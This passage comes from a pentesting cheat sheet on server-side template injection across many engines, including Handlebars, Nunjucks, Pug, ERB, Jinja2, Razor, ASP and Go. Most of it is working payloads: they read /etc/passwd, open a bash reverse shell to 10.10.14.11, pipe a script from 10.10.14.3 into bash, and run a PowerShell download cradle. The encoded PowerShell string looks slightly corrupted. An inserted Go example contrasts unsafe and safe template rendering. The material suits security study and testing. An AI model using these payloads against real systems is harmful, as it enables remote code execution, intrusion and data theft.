%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
```

**More information**

* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)

### JsRender (NodeJS)

| **Template** | **Description** |
| ---------- | --------------------------------------------- |
| | Evaluate and render output |
| | Evaluate and render HTML-encoded output |
| | Comment |
| and | Allow code (disabled by default) |

* \= 49

**Client Side**

```javascript
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```

**Server Side**

```javascript
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```

**More information**

* [https://appcheck-ng.com/template-injection-jsrender-jsviews/](https://appcheck-ng.com/template-injection-jsrender-jsviews/)

### PugJs (NodeJS)

* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`

**Server side render example**

```javascript
var pugjs = require('pug');
home = pugjs.render(injected_page)
```

**More information**

* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/)

### NUNJUCKS (NodeJS) <a href="#nunjucks" id="nunjucks"></a>

* \{{7\*7\}} = 49
* \{{foo\}} = No output
* \#{7\*7} = #{7\*7}
* \{{console.log(1)\}} = Error

```javascript
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>& 1\"')")()}}
```

**More information**

* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine)

### ERB (Ruby)

* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`

```erb
<%= system("whoami") %> #Execute code
<%= Dir.entries('/') %> #List folder
<%= File.open('/etc/passwd').read %> #Read file
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines() %>
<% require 'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>
```

**More information**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)

### Slim (Ruby)

* `{ 7 * 7 }`

```
{ %x|env| }
```

**More information**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby)

### Python

Check the following page to learn tricks about **arbitrary command execution, bypassing sandboxes** in python:

{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/)
{% endcontent-ref %}

### Tornado (Python)

* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{foobar}} = Error`
* `{{7*'7'}} = 7777777`

```python
{% import foobar %} = Error
{% import os %}

{{os.system('whoami')}}
```

**More information**

* [https://ajinabraham.com/blog/server-side-template-injection-in-tornado](https://ajinabraham.com/blog/server-side-template-injection-in-tornado)

### Jinja2 (Python)

[Official website](http://jinja.pocoo.org)

> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.

* `{{7*7}} = Error`
* `${7*7} = ${7*7}`
* `{{foobar}} Nothing`
* `{{4*4}}[[5*5]]`
* `{{7*'7'}} = 7777777`
* `{{config}}`
* `{{config.items()}}`
* `{{settings.SECRET_KEY}}`
* `{{settings}}`
* `{% debug %}`

```jinja
{% debug %}
{{settings.SECRET_KEY}}
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```

**Jinja2 - Template Format**

```jinja
{% extends "layout.html" %}
{% block body %}
  <ul>
  {% for user in users %}
    <li><a href="{{ user.url }}">{{ user.username }}</a></li>
  {% endfor %}
  </ul>
{% endblock %}
```

[**RCE not dependent on**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:

```jinja
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
# Or in the shortest versions:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
```

**More details about how to abuse Jinja**:

{% content-ref url="jinja2-ssti.md" %}
[jinja2-ssti.md](jinja2-ssti.md)
{% endcontent-ref %}

Other payloads at [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2)

### Mako (Python)

```mako
<%
import os
x=os.popen('id').read()
%>
${x}
```

**More information**

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako)

### Razor (.Net)

* `@(2+2) <= Success`
* `@() <= Success`
* `@("{{code}}") <= Success`
* `@ <= Success`
* `@{} <= ERROR!`
* `@{ <= ERROR!`
* `@(1+2)`
* `@( //C#Code )`
* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4MQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBXAFQAYQBzAGsAcwBcAHQAZQBzAHQAbQBlAHQANgA0AC4AZQB4AGUAOwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`

The .NET method `System.Diagnostics.Process.Start` can be used to start any process on the server and thus create a webshell. You can find a vulnerable webapp example at [https://github.com/cnotin/RazorVulnerableApp](https://github.com/cnotin/RazorVulnerableApp)

**More information**

* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)

### ASP
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
* `<%= foo %>` = Nothing
* `<%= response.write(date()) %>` = \<Date>

```asp
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```

**More Information**

* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)

### Mojolicious (Perl)

Even though it is Perl, it uses tags like ERB in Ruby.

* `<%= 7*7 %> = 49`
* `<%= foobar %> = Error`

```
<%= perl code %>
<% perl code %>
```

### SSTI in GO

In Go's template engine, confirmation of its usage can be done with specific payloads:

* `{{ . }}`: Reveals the data structure input. For example, if an object with a `Password` attribute is passed, `{{ .Password }}` could expose it.
* `{{printf "%s" "ssti" }}`: Expected to display the string "ssti".
* `{{html "ssti"}}`, `{{js "ssti"}}`: These payloads should return "ssti" without appending "html" or "js". Further directives can be explored in the Go documentation [here](https://golang.org/pkg/text/template).

**XSS Exploitation**

With the `text/template` package, XSS can be straightforward by inserting the payload directly. Conversely, the `html/template` package encodes the response to prevent this (for example, `{{"<script>alert(1)</script>"}}` results in `&lt;script&gt;alert(1)&lt;/script&gt;`). Nevertheless, template definition and invocation in Go can bypass this encoding: \{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}

**RCE Exploitation**

RCE exploitation differs significantly between `html/template` and `text/template`. The `text/template` module allows calling any public function directly (using the "call" value), which is not permitted in `html/template`. The documentation for these modules is available [here for html/template](https://golang.org/pkg/html/template/) and [here for text/template](https://golang.org/pkg/text/template/).

For RCE via SSTI in Go, object methods can be invoked. For example, if the provided object has a `System` method executing commands, it can be exploited like `{{ .System "ls" }}`. Access to the source code is usually necessary to exploit this, as in the example provided:

```go
import "os/exec"

// Any exported method on the object passed to the template can be called
// from the template; this one runs the template-supplied string as a command
func (p Person) Secret(test string) string {
    out, _ := exec.Command(test).CombinedOutput()
    return string(out)
}
```
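To make the two patterns above concrete, the following Go program is an added example (not code from the page or from the linked research; `Profile`, `ProfileView`, `Greet` and the render helpers are hypothetical names). It renders the same user input once as template source and once as data, with both `text/template` and `html/template`, and shows that an exported method on the context object is callable from a template while a data-only view model is not.

```go
package main

import (
	"bytes"
	"fmt"
	htmltemplate "html/template"
	"io"
	texttemplate "text/template"
)

// Profile is a hypothetical object handed to the template. Every exported
// field and method on it is reachable from template syntax.
type Profile struct {
	Name     string
	Password string // {{ .Password }} would reveal this
}

// Greet is an exported method: {{ .Greet "Hi" }} invokes it from a template.
// A method that ran commands would be reachable in exactly the same way.
func (p Profile) Greet(greeting string) string {
	return greeting + ", " + p.Name
}

// ProfileView is the data-only view model: no secrets, no methods.
type ProfileView struct {
	Name string
}

// executor is satisfied by both *text/template.Template and *html/template.Template.
type executor interface {
	Execute(w io.Writer, data interface{}) error
}

func run(t executor, data interface{}) (string, error) {
	var buf bytes.Buffer
	if err := t.Execute(&buf, data); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// renderUnsafe is the SSTI bug: user input becomes part of the template
// SOURCE, so any {{ ... }} action inside it is parsed and evaluated against data.
func renderUnsafe(userInput string, data interface{}) (string, error) {
	t, err := texttemplate.New("page").Parse("Hello " + userInput + "!")
	if err != nil {
		return "", err
	}
	return run(t, data)
}

// renderSafeText keeps the template fixed and passes the input as DATA.
// Template syntax in the input stays literal text, but text/template does not
// escape HTML, so the output is still XSS-prone when served as HTML.
func renderSafeText(userInput string) (string, error) {
	t := texttemplate.Must(texttemplate.New("page").Parse("Hello {{.}}!"))
	return run(t, userInput)
}

// renderSafeHTML does the same with html/template, which escapes the value
// according to the HTML context it lands in.
func renderSafeHTML(userInput string) (string, error) {
	t := htmltemplate.Must(htmltemplate.New("page").Parse("Hello {{.}}!"))
	return run(t, userInput)
}

func main() {
	p := Profile{Name: "alice", Password: "hunter2"} // constructed sample data
	for _, in := range []string{`{{printf "%s" "ssti"}}`, `{{ .Password }}`, `{{ .Greet "Hi" }}`} {
		out, err := renderUnsafe(in, p)
		fmt.Printf("unsafe %-22s -> %q err=%v\n", in, out, err)
	}
	// The same method call fails against the data-only view model.
	_, err := renderUnsafe(`{{ .Greet "Hi" }}`, ProfileView{Name: "alice"})
	fmt.Println("unsafe with ProfileView:", err)

	xss := `<script>alert(1)</script>`
	out, _ := renderSafeText(`{{printf "%s" "ssti"}}`)
	fmt.Printf("text/template as data -> %q\n", out)
	out, _ = renderSafeText(xss)
	fmt.Printf("text/template as data -> %q\n", out)
	out, _ = renderSafeHTML(xss)
	fmt.Printf("html/template as data -> %q\n", out)
}
```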

**More information**

* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html)
* [https://www.onsecurity.io/blog/go-ssti-method-research/](https://www.onsecurity.io/blog/go-ssti-method-research/)

### More Exploits

Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection) for more exploits. You can also find interesting information about tags at [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)

## BlackHat PDF

{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}

## Related Help

If you find it useful, read:

* [Flask Tricks](../../network-services-pentesting/pentesting-web/flask.md)
* [Python Magic Functions](https://github.com/carlospolop/hacktricks/blob/pt/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md)

## Tools

* [https://github.com/Hackmanit/TInjA](https://github.com/Hackmanit/TInjA)
* [https://github.com/vladko312/sstimap](https://github.com/vladko312/sstimap)
* [https://github.com/epinna/tplmap](https://github.com/epinna/tplmap)
* [https://github.com/Hackmanit/template-injection-table](https://github.com/Hackmanit/template-injection-table)

## Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}

## Practice and References

* [https://portswigger.net/web-security/server-side-template-injection/exploiting](https://portswigger.net/web-security/server-side-template-injection/exploiting)
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI)
* [https://portswigger.net/web-security/server-side-template-injection](https://portswigger.net/web-security/server-side-template-injection)